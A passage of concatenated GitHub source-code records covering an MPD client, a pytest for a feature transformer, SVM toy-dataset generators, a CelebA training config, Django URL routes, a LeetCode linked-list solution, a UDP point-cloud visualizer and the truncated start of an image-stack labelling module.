readSingleReply(self):\n\t\t\"\"\"Read a reply with a single assignment.\"\"\"\n\t\tres = {}\n\t\trest = []\n\t\t\n\t\twhile True:\n\t\t\tline = self.read()\n\t\t\tif self.__completionRE.match(line) != None:\n\t\t\t\treturn self.returnStatus(line, res, rest)\n\n\t\t\tm = self.__assignmentRE.match(line)\n\t\t\tif m != None:\t\t\t\tres[m.group(1)] = m.group(2)\n\t\t\telse:\n\t\t\t\trest.append(line)\n\t\n\tdef readListReply(self, newKeys = []):\n\t\t\"\"\"Read a reply with a list of assignments. newKeys should be a list of keys that may start a new item.\"\"\"\n\t\tres = []\n\t\trest = []\n\t\tcur = {}\n\t\t\n\t\twhile True:\n\t\t\tline = self.read()\n\t\t\tif self.__completionRE.match(line) != None:\n\t\t\t\tres.append(cur)\n\t\t\t\treturn self.returnStatus(line, res, rest)\n\n\t\t\tm = self.__assignmentRE.match(line)\n\t\t\tif m != None:\n\t\t\t\tif m.group(1) in newKeys:\n\t\t\t\t\tif cur != {}:\n\t\t\t\t\t\tres.append(cur)\n\t\t\t\t\tcur = {}\n\t\t\t\tcur[m.group(1)] = m.group(2)\n\t\t\telse:\n\t\t\t\trest.append(l)\n\t\t\n\t\n__mpc = None\nlastStatus = None\n__newKeys = {\n\t\"listplaylistinfo\": [\"file\"],\n\t\"lsinfo\": [\"directory\", \"file\", \"playlist\"],\n\t\"playlistinfo\": [\"file\"],\n\t\"search\": [\"file\"],\n}\n\ndef init(host = \"localhost\", port = 6600):\n\t\"\"\"Initialize singleton mpc instance.\"\"\"\n\tglobal __mpc\n\t__mpc = MPC(host, port)\n\ndef genericSingle(cmd, args = []):\n\t\"\"\"Handle all commands that return an single or no assignment.\"\"\"\n\t__mpc.send(cmd + \" \" + \" \".join(map(lambda x: '\"' + str(x) + '\"', args)))\n\treturn __mpc.readSingleReply()\n\ndef genericList(cmd, args = [], newKeys = None):\n\t\"\"\"Handle all commands that return a list of assignments.\"\"\"\n\tif newKeys == None:\n\t\tif cmd in __newKeys:\n\t\t\tnewKeys = __newKeys[cmd]\n\t\telse:\n\t\t\tnewKeys = []\n\t\n\t__mpc.send(cmd + \" \" + \" \".join(map(lambda x: '\"' + str(x) + '\"', args)))\n\treturn __mpc.readListReply(newKeys)\n\ndef status():\n\t\"\"\"Return current status. Combines results of status and currentsong and updates lastStatus variable.\"\"\"\n\tres = {\n\t\t\"status\": genericSingle(\"status\")[1],\n\t\t\"song\": genericSingle(\"currentsong\")[1],\n\t}\n\tglobal lastStatus\n\tlastStatus = res\n\treturn res\n\nif __name__ == \"__main__\":\n\tinit()\n\tprint(genericSingle(\"status\"))\n\t","repo_name":"nafur/flmpc","sub_path":"pympc.py","file_name":"pympc.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"69807218188","text":"import pytest\nfrom pycompete.features.transformers import RemoveCorrelated\nimport numpy as np\n\n\n@pytest.mark.parametrize(\n \"X, X_expected, max_correlation\",\n [\n (\n np.array([[0, 0.1, 0.04], [0.4, 0.45, -1], [0.78, 0.81, 2]]),\n np.array([[0, 0.04], [0.4, -1], [0.78, 2]]),\n 0.95,\n ),\n (\n np.array([[0, 0.1, 0.04], [0.4, 0.45, -1], [0.78, 0.81, 2]]),\n np.array([[0, 0.1, 0.04], [0.4, 0.45, -1], [0.78, 0.81, 2]]),\n 1,\n ),\n ],\n)\ndef test_remove_correlated(X, X_expected, max_correlation):\n rc = RemoveCorrelated(max_correlation=max_correlation)\n rc.fit(X)\n X_transformed = rc.transform(X)\n assert np.allclose(X_transformed, X_expected, rtol=1e-05)\n","repo_name":"FChmiel/pycompete","sub_path":"tests/unit/features/test_transformers.py","file_name":"test_transformers.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"82"} +{"seq_id":"15864059382","text":"# ------*------ coding: utf-8 ------*------\n# @Time : 2023/4/11 18:54\n# @Author : 冰糖雪狸 (NekoSilverfox)\n# @Project : CUC\n# @File : dataset.py\n# @Software: PyCharm\n# @Github :https://github.com/NekoSilverFox\n# -----------------------------------------\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\nfrom numpy import pi\n\n\nRANDOM_STATE = 90102\n\n\ndef test_data_1():\n # 获取数据集(具有正态分布的)\n x_1_1 = pd.Series(np.random.normal(loc=28, scale=3, size=100), name='x1')\n x_1_2 = pd.Series(np.random.normal(loc=25, scale=3, size=100), name='x2')\n y_1 = pd.Series(['blue'] * 50, name='target')\n\n x_2_1 = pd.Series(np.random.normal(loc=8, scale=3, size=100), name='x1')\n x_2_2 = pd.Series(np.random.normal(loc=12, scale=3, size=100), name='x2')\n y_2 = pd.Series(['red'] * 50, name='target')\n\n plt.figure(figsize=(5, 5), dpi=100)\n plt.scatter(x_1_1, x_1_2, s=5, c='blue')\n plt.scatter(x_2_1, x_2_2, s=5, c='red')\n plt.show()\n\n tmp_data_1 = pd.concat([x_1_1, x_1_2, y_1], axis=1)\n tmp_data_2 = pd.concat([x_2_1, x_2_2, y_2], axis=1)\n data = pd.concat([tmp_data_1, tmp_data_2], axis=0)\n # data = shuffle(data).reset_index(drop=True) # 打乱样本顺序\n\n plt.figure(figsize=(5, 5))\n plt.scatter(x=data[data['Color'] == 'red'].iloc[:, 0], y=data[data['Color'] == 'red'].iloc[:, 1], s=5, c='red')\n plt.scatter(x=data[data['Color'] == 'green'].iloc[:, 0], y=data[data['Color'] == 'green'].iloc[:, 1], s=5,\n c='blue')\n plt.show()\n\n # 划分数据集\n return train_test_split(data.iloc[:, :-1], data.iloc[:, -1])\n\n\ndef test_data_a():\n data_train = pd.read_csv(filepath_or_buffer='./test_data/svmdata_a.txt', sep='\\t')\n data_test = pd.read_csv(filepath_or_buffer='./test_data/svmdata_a_test.txt', sep='\\t')\n data = pd.concat([data_train, data_test], axis=0)\n # data = shuffle(data).reset_index(drop=True)\n\n print(data)\n plt.figure(figsize=(5, 5))\n plt.scatter(x=data[data['Color'] == 'red'].iloc[:, 0], y=data[data['Color'] == 'red'].iloc[:, 1], s=5, c='red')\n plt.scatter(x=data[data['Color'] == 'green'].iloc[:, 0], y=data[data['Color'] == 'green'].iloc[:, 1], s=5,\n c='blue')\n plt.savefig('./output/dataset-NormalDiagonal.png')\n plt.show()\n\n return train_test_split(data.iloc[:, :-1], data.iloc[:, -1], random_state=RANDOM_STATE)\n\n\ndef test_data_b():\n data_train = pd.read_csv(filepath_or_buffer='./test_data/svmdata_b.txt', sep='\\t')\n data_test = pd.read_csv(filepath_or_buffer='./test_data/svmdata_b_test.txt', sep='\\t')\n data = pd.concat([data_train, data_test], axis=0)\n data = shuffle(data).reset_index(drop=True)\n return train_test_split(data.iloc[:, :-1], data.iloc[:, -1], random_state=RANDOM_STATE)\n\n\ndef sawtooth():\n data_train = pd.read_csv(filepath_or_buffer='./test_data/svmdata_d.txt', sep='\\t')\n data_test = pd.read_csv(filepath_or_buffer='./test_data/svmdata_d_test.txt', sep='\\t')\n data = pd.concat([data_train, data_test], axis=0)\n print(data.shape)\n # data = shuffle(data).reset_index(drop=True)\n\n plt.figure(figsize=(5, 5))\n plt.scatter(x=data[data['Colors'] == 'red'].iloc[:, 0], y=data[data['Colors'] == 'red'].iloc[:, 1], s=18, c='red')\n plt.scatter(x=data[data['Colors'] == 'green'].iloc[:, 0], y=data[data['Colors'] == 'green'].iloc[:, 1], s=18, c='blue')\n plt.savefig('./output/dataset-Sawtooth.png')\n plt.show()\n\n # return train_test_split(data.iloc[:, :-1], data.iloc[:, -1], random_state=RANDOM_STATE)\n return data_train.iloc[:, :-1], data_test.iloc[:, :-1], data_train.iloc[:, -1], data_test.iloc[:, -1]\n\n\ndef test_data_e():\n data_train = pd.read_csv(filepath_or_buffer='./test_data/svmdata_e.txt', sep='\\t')\n data_test = pd.read_csv(filepath_or_buffer='./test_data/svmdata_e_test.txt', sep='\\t')\n data = pd.concat([data_train, data_test], axis=0)\n # data = shuffle(data).reset_index(drop=True)\n return train_test_split(data.iloc[:, :-1], data.iloc[:, -1], random_state=RANDOM_STATE)\n\n\ndef fourclass():\n data = pd.read_csv(filepath_or_buffer='./test_data/fourclass.csv')\n data = data.dropna(axis=0)\n data_1 = data[data['target'] == -1.0]\n data_2 = data[data['target'] == 1.0]\n plt.figure(figsize=(5, 5))\n plt.scatter(x=data_1.iloc[:, 0], y=data_1.iloc[:, 1], s=5, c='blue')\n plt.scatter(x=data_2.iloc[:, 0], y=data_2.iloc[:, 1], s=5, c='red')\n plt.savefig('./output/dataset-fourclass.png')\n plt.show()\n\n return train_test_split(data.values[:, :-1], data.values[:, -1], random_state=RANDOM_STATE)\n\ndef dataset_nesting():\n plt.figure(figsize=(5, 5))\n tmp_x1 = np.random.uniform(low=0, high=10, size=500)\n tmp_y1 = np.random.uniform(low=0, high=10, size=500)\n tmp_t1 = np.full(shape=(500,), fill_value='red')\n data_1 = pd.concat([pd.Series(tmp_x1), pd.Series(tmp_y1), pd.Series(tmp_t1)], axis=1)\n data_1.columns = ('x', 'y', 'target')\n data_1 = data_1.drop(data_1.query('x > 3 & x < 7 & y > 2 & y < 8').index, axis=0)\n plt.scatter(data_1['x'], data_1['y'], s=5, c='red')\n\n tmp_x2 = np.random.uniform(low=3, high=7, size=200)\n tmp_y2 = np.random.uniform(low=2, high=8, size=200)\n tmp_t2 = np.full(shape=(200,), fill_value='blue')\n data_2 = pd.concat([pd.Series(tmp_x2), pd.Series(tmp_y2), pd.Series(tmp_t2)], axis=1)\n data_2.columns = ('x', 'y', 'target')\n plt.scatter(data_2['x'], data_2['y'], s=5, c='blue')\n plt.show()\n\n data = pd.concat([data_1, data_2], axis=0)\n # data = shuffle(data).reset_index(drop=True)\n return train_test_split(data.values[:, :-1], data.values[:, -1], random_state=RANDOM_STATE)\n\n\ndef checkerboard():\n num_every_board = 200 # 每个棋盘中粒子数量\n\n data_red_1 = pd.concat([pd.Series(np.random.uniform(low=2.5, high=5.0, size=num_every_board)),\n pd.Series(np.random.uniform(low=0, high=2.5, size=num_every_board))], axis=1)\n\n data_red_2 = pd.concat([pd.Series(np.random.uniform(low=7.5, high=10, size=num_every_board)),\n pd.Series(np.random.uniform(low=0.0, high=2.5, size=num_every_board))], axis=1)\n\n data_red_3 = pd.concat([pd.Series(np.random.uniform(low=0.0, high=2.5, size=num_every_board)),\n pd.Series(np.random.uniform(low=2.5, high=5.0, size=num_every_board))], axis=1)\n\n data_red_4 = pd.concat([pd.Series(np.random.uniform(low=5.0, high=7.5, size=num_every_board)),\n pd.Series(np.random.uniform(low=2.5, high=5.0, size=num_every_board))], axis=1)\n\n data_red_5 = pd.concat([pd.Series(np.random.uniform(low=2.5, high=5.0, size=num_every_board)),\n pd.Series(np.random.uniform(low=5.0, high=7.5, size=num_every_board))], axis=1)\n\n data_red_6 = pd.concat([pd.Series(np.random.uniform(low=7.5, high=10, size=num_every_board)),\n pd.Series(np.random.uniform(low=5.0, high=7.5, size=num_every_board))], axis=1)\n\n data_red_7 = pd.concat([pd.Series(np.random.uniform(low=0.0, high=2.5, size=num_every_board)),\n pd.Series(np.random.uniform(low=7.5, high=10, size=num_every_board))], axis=1)\n\n data_red_8 = pd.concat([pd.Series(np.random.uniform(low=5.0, high=7.5, size=num_every_board)),\n pd.Series(np.random.uniform(low=7.5, high=10, size=num_every_board))], axis=1)\n data_red = pd.concat([data_red_1, data_red_2, data_red_3, data_red_4,\n data_red_5, data_red_6, data_red_7, data_red_8], axis=0)\n target_red = pd.Series(np.full(shape=(8 * num_every_board,), fill_value=0))\n\n data_red = data_red.reset_index(drop=True)\n data_red = pd.concat([data_red, target_red], axis=1)\n data_red.columns = ('x', 'y', 'target')\n\n data_blue_1 = pd.concat([pd.Series(np.random.uniform(low=0.0, high=2.5, size=num_every_board)),\n pd.Series(np.random.uniform(low=0.0, high=2.5, size=num_every_board))], axis=1)\n\n data_blue_2 = pd.concat([pd.Series(np.random.uniform(low=5.0, high=7.5, size=num_every_board)),\n pd.Series(np.random.uniform(low=0.0, high=2.5, size=num_every_board))], axis=1)\n\n data_blue_3 = pd.concat([pd.Series(np.random.uniform(low=2.5, high=5.0, size=num_every_board)),\n pd.Series(np.random.uniform(low=2.5, high=5.0, size=num_every_board))], axis=1)\n\n data_blue_4 = pd.concat([pd.Series(np.random.uniform(low=7.5, high=10, size=num_every_board)),\n pd.Series(np.random.uniform(low=2.5, high=5.0, size=num_every_board))], axis=1)\n\n data_blue_5 = pd.concat([pd.Series(np.random.uniform(low=0.0, high=2.5, size=num_every_board)),\n pd.Series(np.random.uniform(low=5.0, high=7.5, size=num_every_board))], axis=1)\n\n data_blue_6 = pd.concat([pd.Series(np.random.uniform(low=5.0, high=7.5, size=num_every_board)),\n pd.Series(np.random.uniform(low=5.0, high=7.5, size=num_every_board))], axis=1)\n\n data_blue_7 = pd.concat([pd.Series(np.random.uniform(low=2.5, high=5.0, size=num_every_board)),\n pd.Series(np.random.uniform(low=7.5, high=10, size=num_every_board))], axis=1)\n\n data_blue_8 = pd.concat([pd.Series(np.random.uniform(low=7.5, high=10, size=num_every_board)),\n pd.Series(np.random.uniform(low=7.5, high=10, size=num_every_board))], axis=1)\n data_blue = pd.concat([data_blue_1, data_blue_2, data_blue_3, data_blue_4,\n data_blue_5, data_blue_6, data_blue_7, data_blue_8], axis=0)\n target_blue = pd.Series(np.full(shape=(8 * num_every_board,), fill_value=1))\n\n data_blue = data_blue.reset_index(drop=True)\n data_blue = pd.concat([data_blue, target_blue], axis=1)\n data_blue.columns = ('x', 'y', 'target')\n\n data = pd.concat([data_red, data_blue], axis=0)\n # data = shuffle(data).reset_index(drop=True)\n nn, x_test, nnn, y_test = train_test_split(data.values[:, :-1], data.values[:, -1], random_state=RANDOM_STATE)\n\n num_noise = 300 # 噪音数量\n noise_red = pd.concat([pd.Series(np.random.uniform(low=0.0, high=10.0, size=num_noise)),\n pd.Series(np.random.uniform(low=0.0, high=10.0, size=num_noise)),\n pd.Series(np.full(shape=(num_noise,), fill_value=0))], axis=1)\n noise_red.columns = ('x', 'y', 'target')\n noise_blue = pd.concat([pd.Series(np.random.uniform(low=0.0, high=10.0, size=num_noise)),\n pd.Series(np.random.uniform(low=0.0, high=10.0, size=num_noise)),\n pd.Series(np.full(shape=(num_noise,), fill_value=1))], axis=1)\n noise_blue.columns = ('x', 'y', 'target')\n noise = pd.concat([noise_red, noise_blue], axis=0)\n data = pd.concat([data, noise], axis=0) # 加入噪音\n\n plt.figure(figsize=(5, 5))\n plt.scatter(data_red['x'], data_red['y'], s=5, c='red')\n plt.scatter(data_blue['x'], data_blue['y'], s=5, c='blue')\n plt.scatter(noise_red['x'], noise_red['y'], s=5, c='red', marker='o')\n plt.scatter(noise_blue['x'], noise_blue['y'], s=5, c='blue', marker='o')\n plt.savefig('./output/dataset-checkerboard.png')\n plt.show()\n\n x_train, nn, y_train, nnn = train_test_split(data.values[:, :-1], data.values[:, -1], random_state=RANDOM_STATE)\n\n return x_train, x_test, y_train, y_test\n\n\ndef double_helix():\n N = 400\n theta = np.sqrt(np.random.rand(N)) * 2 * pi # np.linspace(0,2*pi,100)\n\n r_a = 2 * theta + pi\n data_a = np.array([np.cos(theta) * r_a, np.sin(theta) * r_a]).T\n x_a = data_a + np.random.randn(N, 2)\n\n r_b = -2 * theta - pi\n data_b = np.array([np.cos(theta) * r_b, np.sin(theta) * r_b]).T\n x_b = data_b + np.random.randn(N, 2)\n\n res_a = np.append(x_a, np.zeros((N, 1)), axis=1) # 带有特征值和目标值\n res_b = np.append(x_b, np.ones((N, 1)), axis=1)\n\n data = np.append(res_a, res_b, axis=0)\n print(data.shape)\n\n plt.figure(figsize=(5, 5))\n plt.scatter(x_a[:, 0], x_a[:, 1], s=5, c='red')\n plt.scatter(x_b[:, 0], x_b[:, 1], s=5, c='blue')\n plt.savefig('./output/dataset-DoubleHelix.png')\n plt.show()\n return train_test_split(data[:, :-1], data[:, -1], random_state=RANDOM_STATE)\n","repo_name":"NekoSilverFox/CUC","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":12369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"82"} +{"seq_id":"73047102667","text":"# IMPORT\nimport os\n\n# Define the file path\nDATASET_PATH = '../celeba_dataset'\nATTR_PATH = os.path.sep.join([DATASET_PATH, 'list_attr_celeba.csv'])\nBBOX_PATH = os.path.sep.join([DATASET_PATH, 'list_bbox_celeba.csv'])\nPART_PATH = os.path.sep.join([DATASET_PATH, 'list_eval_partition.csv'])\nLAND_PATH = os.path.sep.join([DATASET_PATH, 'list_landmarks_align_celeba.csv'])\nALIGN_IMAGES_PATH = os.path.sep.join([DATASET_PATH, 'img_align_celeba/img_align_celeba/'])\nWILD_IMAGES_PATH = os.path.sep.join([DATASET_PATH, 'in_the_wild_celeba/in_the_wild_celeba/'])\n\n# Define the output directory\nBASE_OUTPUT = \"output\"\nBBOX_MODEL_PATH = os.path.sep.join([BASE_OUTPUT, 'bbox_model.h5'])\nLANDMARK_MOEL_PATH = os.path.sep.join([BASE_OUTPUT, 'landmark_model.h5'])\nATTR_MODEL_PATH = os.path.sep.join([BASE_OUTPUT, 'attr_model.h5'])\nPLOT_PATH = os.path.sep.join([BASE_OUTPUT, 'plot.png'])\n\n# Define the prepared directory\nREADY_DATA = \"ready_data\" \nTRAIN_FILENAMES = os.path.sep.join([READY_DATA, 'train_img_filenameList.txt'])\nVALID_FILENAMES = os.path.sep.join([READY_DATA, 'valid_img_filenameList.txt'])\nTEST_FILENAMES = os.path.sep.join([READY_DATA, 'test_img_filenameList.txt'])\nTRAIN_BBOX = os.path.sep.join([READY_DATA, 'train_img_bbox.txt'])\nVALID_BBOX = os.path.sep.join([READY_DATA, 'valid_img_bbox.txt'])\nTEST_BBOX = os.path.sep.join([READY_DATA, 'test_img_bbox.txt'])\nTRAIN_LANDMARK = os.path.sep.join([READY_DATA, 'train_img_landmark.txt'])\nVALID_LANDMARK = os.path.sep.join([READY_DATA, 'valid_img_landmark.txt'])\nTEST_LANDMARK = os.path.sep.join([READY_DATA, 'test_img_landmark.txt'])\nTRAIN_ATTR = os.path.sep.join([READY_DATA, 'train_img_attr.txt'])\nVALID_ATTR = os.path.sep.join([READY_DATA, 'valid_img_attr.txt'])\nTEST_ATTR = os.path.sep.join([READY_DATA, 'test_img_attr.txt'])\nATTR_LIST = os.path.sep.join([READY_DATA, 'attr_list.txt'])\n\n# Define original image dimension\nIMG_WIDTH = 178.0\nIMG_HEIGHT = 218.0\n\n# Define traing and predicting target_image_dimension\nTAR_IMG_WIDTH = 224\nTAR_IMG_HEIGHT = 224\n\n# Define deep learning hyperparameters\nINIT_LR = 0.00001\nNUM_EPOCHS = 100\nBATCH_SIZE = 32\n\n# Supress the tensorflow warning messages\n# by adjusting the verbosity by changing the value of TF_CPP_MIN_LOG_LEVEL:\n# 0 = all message are logged (default behavior)\n# 1 = INFO messages are not printed\n# 2 = INFO and WARNING messages are not printed\n# 3 = INFO, WARNING, and ERROR messages are not printed\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n# Print iterations progress\ndef progressBar(iterable, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█', printEnd = \"\\r\"):\n \"\"\"\n Call in a loop to create terminal progress bar\n @Author of this Function: Greenstick from stackoverflow\n @URL: https://stackoverflow.com/a/34325723\n @params:\n iterable - Required : iterable object (Iterable)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n printEnd - Optional : end character (e.g. \"\\r\", \"\\r\\n\") (Str)\n \"\"\"\n total = len(iterable)\n # Progress Bar Printing Function\n def printProgressBar (iteration):\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print(f'\\r{prefix} |{bar}| {percent}% {suffix}', end = printEnd)\n # Initial Call\n printProgressBar(0)\n # Update Progress Bar\n for i, item in enumerate(iterable):\n yield item\n printProgressBar(i + 1)\n # Print New Line on Complete\n print()","repo_name":"yang242j/Facial-Attributes-Detection","sub_path":"Project/code/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"71529866509","text":"from django.conf.urls import include, url, patterns\nfrom product import views\n\nurlpatterns = patterns('',\n\n #\n # Product Views\n #\n\n url(regex=r'^$',\n view = views.ProductSearchableListView.as_view(),\n name = 'product_list',\n ),\n url(regex = r'^add/$',\n view = views.ProductCreateView.as_view(),\n name = 'product_add',\n ),\n url(regex = r'^(?P\\d+)/$',\n view = views.ProductUpdateView.as_view(),\n name = 'product_edit',\n ),\n url(regex = r'^(?P\\d+)/delete/$',\n view = views.ProductDeleteView.as_view(),\n name = 'product_delete',\n ),\n\n #\n # Brand Views\n #\n url(regex=r'^brand/$',\n view = views.BrandSearchableListView.as_view(),\n name = 'brand_list',\n ),\n\n url(regex=r'^brand/add/$',\n view = views.BrandCreateView.as_view(),\n name = 'brand_add',\n ),\n\n url(regex=r'^brand/(?P\\d+)/$',\n view = views.BrandUpdateView.as_view(),\n name = 'brand_edit',\n ),\n\n #\n # Model Views\n #\n\n url(regex=r'^model/$',\n view = views.ModelSearchableListView.as_view(),\n name = 'model_list',\n ),\n\n url(regex=r'^model/add/$',\n view = views.ModelCreateView.as_view(),\n name = 'model_add',\n ),\n\n url(regex=r'^model/(?P\\d+)/$',\n view = views.ModelUpdateView.as_view(),\n name = 'model_edit',\n ),\n\n\n\n\n)\n","repo_name":"edgabaldi/tcc","sub_path":"product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"82"} +{"seq_id":"74236788107","text":"class Solution:\n \n def helper(self, head, n):\n \"\"\"reverses the first n elements of the list\"\"\"\n new_list = None\n orig_head = head\n for _ in range(n):\n temp = head\n head = head.next\n temp.next = new_list\n new_list = temp\n orig_head.next = head\n return new_list\n \n \n def reverseBetween(self, head: Optional[ListNode], left: int, right: int) -> Optional[ListNode]:\n dummy = ListNode(next=head)\n curr = dummy\n for _ in range(left - 1):\n curr = curr.next\n curr.next = self.helper(curr.next, right - left + 1)\n return dummy.next","repo_name":"AubynKen/LeetCode","sub_path":"0094. (Medium) Reverse Linked List II.py","file_name":"0094. (Medium) Reverse Linked List II.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"30999745111","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport sys\nimport numpy as np\nimport socket\nimport threading\n\nimport pyqtgraph.opengl as gl\nfrom pyqtgraph.Qt import QtCore, QtGui\n\nclass Visualizer(object):\n def __init__(self):\n self.point_size = 3.0\n self.traces = dict()\n self.app = QtGui.QApplication(sys.argv)\n self.w = gl.GLViewWidget()\n self.w.opts['distance'] = 40\n self.w.setWindowTitle('Visualizer')\n self.w.setGeometry(0, 110, 1920, 1080)\n self.w.show()\n\n # create the background grids\n gx = gl.GLGridItem()\n gx.rotate(90, 0, 1, 0)\n gx.translate(-10, 0, 10)\n self.w.addItem(gx)\n gy = gl.GLGridItem()\n gy.rotate(90, 1, 0, 0)\n gy.translate(0, -10, 10)\n self.w.addItem(gy)\n gz = gl.GLGridItem()\n gz.translate(0, 0, 0)\n self.w.addItem(gz)\n\n pts = np.array([[0,0,0]])\n self.traces[0] = gl.GLScatterPlotItem(pos=pts, color=(1.,1.,1.,0.), size=self.point_size)\n self.w.addItem(self.traces[0])\n \n self.points = pts\n \n self.PORT = 6666\n self.stop_read_event = threading.Event()\n \n self.read_cyclic = threading.Thread(\n target=self.read_data, args=()\n )\n \n def start(self):\n self.soc = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.soc.bind(('', self.PORT))\n self.stop_read_event.clear()\n self.read_cyclic.start()\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n QtGui.QApplication.instance().exec_()\n \n def close(self):\n self.stop_read_event.set()\n if self.soc is not None:\n self.soc.close()\n QtGui.QApplication.instance().quit()\n\n def read_data(self):\n while not self.stop_read_event.is_set():\n data = self.soc.recv(65535)\n self.points = np.frombuffer(data,dtype=\"float32\").reshape(int(len(data)/12), 3)\n \n def set_plotdata(self, points, color):\n self.traces[0].setData(pos=points, color=color, size=self.point_size)\n\n def update(self):\n #self.points = global_pc.T\n self.set_plotdata(\n points=self.points,\n color=(0.,1.,1.,1.)\n )\n\n def animation(self):\n timer = QtCore.QTimer()\n timer.timeout.connect(self.update)\n timer.start(16)\n self.start()\n \n def get_color(self, pts):\n z_max = np.max(pts, axis=0)[2]\n z_min = np.min(pts, axis=0)[2]\n z_avg = np.mean(pts, axis=0)[2]\n delta = min(z_max - z_avg, z_avg - z_min)\n z_max = z_avg + delta\n z_min = z_avg - delta\n \n colors = np.ones((pts.shape[0], 4))\n for i in range(len(pts)):\n color = (pts[i][2] - z_min)/(z_max - z_min)\n color = max(0, min(color, 1))\n colors[i][0] = 2*color-1 if color > 0.5 else 0\n colors[i][1] = 2 - 2*color if color > 0.5 else 2*color\n colors[i][2] = 0 if color > 0.5 else 1 - 2*color\n return colors\n \nif __name__ == '__main__':\n v = Visualizer()\n v.animation()\n v.close()","repo_name":"ZJU-Robotics-Lab/CICT","sub_path":"scripts/generate_data/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":3183,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"82"} +{"seq_id":"20272226772","text":"from __future__ import print_function\nfrom log_tool import *\n# import labelled stack\n\n#from ev_split import ev_split\n\nfrom labelled_stack import LabelledStack\n#from projection_mesh import ProjectionMesh\n\n#from gen_mesh import make_iso_open_z as make_iso\n#from gen_mesh import make_iso_manifold_smooth\n#from gen_mesh import make_iso_manifold\n#from gen_mesh import make_iso_labels\n\n\nimport numpy as np\nimport scipy.ndimage as nd\nimport itertools\n\nfrom skimage.segmentation import random_walker\nfrom skimage.draw import line\nimport skimage.exposure\nimport skimage.measure\n\nfrom image_io.import_tiff import *\nfrom image_io.import_image_dir import *\nfrom image_io.import_png import *\n\nfrom utils_new import *\nfrom utils_itk import *\n\nimport scipy.linalg as la\n\nimport SimpleITK as sitk\n\nimport eval_seg\n#import objgraph\n\n#from viewer.libintersect import stack_from_mesh\n\n#from track_allocations import AllocationTracker\n\n#import psutil\nimport os\n\nimport csv\nimport blosc\nimport copy\n\n\nimport collections\n\ndef undo_no_log(f):\n @wraps(f)\n def func_wrapper(*args, **kwargs):\n self = args[0]\n self.log.write('[\"{}\",{},{}]'.format(f.__name__,args[1:],kwargs)+'\\n')\n self.log.flush()\n v = f(*args, **kwargs)\n def u():\n f(*args, **kwargs)\n def undo():\n pass\n return v\n return func_wrapper\n\n\ndef undo_signal(f):\n @undo_log\n @wraps(f)\n def func_wrapper(*args, **kwargs):\n self=args[0]\n # also need to preserve cell data ....\n\n old_signal = self.get_signal_controller().get_stack()\n def undo():\n self.get_label_controller().set_stack(old_signal)\n v = f(*args, **kwargs)\n return undo, v\n\n return func_wrapper\n\n\"\"\"\n old_selected = self.get_label_controller().get_selected()\n def undo():\n self.get_label_controller().set_selected(old_selected)\n\"\"\"\n\ndef undo_selected(f):\n @undo_log\n @wraps(f)\n def func_wrapper(*args, **kwargs):\n self=args[0]\n\n old_selected = self.get_label_controller().get_selected()\n def undo():\n self.get_label_controller().set_selected(old_selected)\n\n v = f(*args, **kwargs)\n return undo, v\n\n return func_wrapper\n\n\ndef undo_label(f):\n @undo_log\n @wraps(f)\n def func_wrapper(*args, **kwargs):\n self=args[0]\n # also need to preserve cell data ....\n\n old_state = self.get_label_controller().get_state()\n def undo():\n self.get_label_controller().set_state(old_state)\n\n v = f(*args, **kwargs)\n return undo, v\n\n return func_wrapper\n\n\n\ndef downsample_max(ma, k):\n return ma.reshape(ma.shape[0]//k, k, ma.shape[1]//k, k, ma.shape[2]//k, k).max(axis=(1,3,5))\n\n\ndef downsample(ma, k):\n return ma.reshape(ma.shape[0]//k, k, ma.shape[1]//k, k, ma.shape[2]//k, k).sum(axis=(1,3,5))/k/k/k\n\ndef upsample(ma, k):\n return nd.zoom(ma, k, order=1)\n\n\n\nclass Obj(object):\n pass\n\n\ndef apply_clip_planes(clip_planes, stack):\n x, y, z = np.ogrid[0:stack.shape[0], 0:stack.shape[1], 0:stack.shape[2]]\n transform = np.diag([stack.shape[2]-1, stack.shape[1]-1, stack.shape[0]-1, 1])\n norm_transform = (la.inv(transform)[:3,:3]).T\n for p, n in clip_planes:\n p = np.dot(transform, np.hstack((p,[1])))\n n = np.dot(norm_transform, n)\n print(stack.shape, x.shape, y.shape, z.shape)\n for i in range(0, stack.shape[0], 16):\n r = slice(i, min(i+16, stack.shape[0]))\n stack[r, :, :][((x[r,:,:]-p[2])*n[2]+(y-p[1])*n[1]+(z-p[0])*n[0])>0] = 0\n return stack\n\n\n\ndef make_label_obj(so, sso):\n o = Obj() \n o.so = so\n o.sso = sso\n\n tl = np.array((so.shape[2]*so.spacing[0],\n so.shape[1]*so.spacing[1],\n so.shape[0]*so.spacing[2]))\n \n\n dx = 0.0# 0.5/so.tex_shape[2] \n dy = 0.0# 0.5/so.tex_shape[1] \n dz = 0.0# 0.5/so.tex_shape[0] 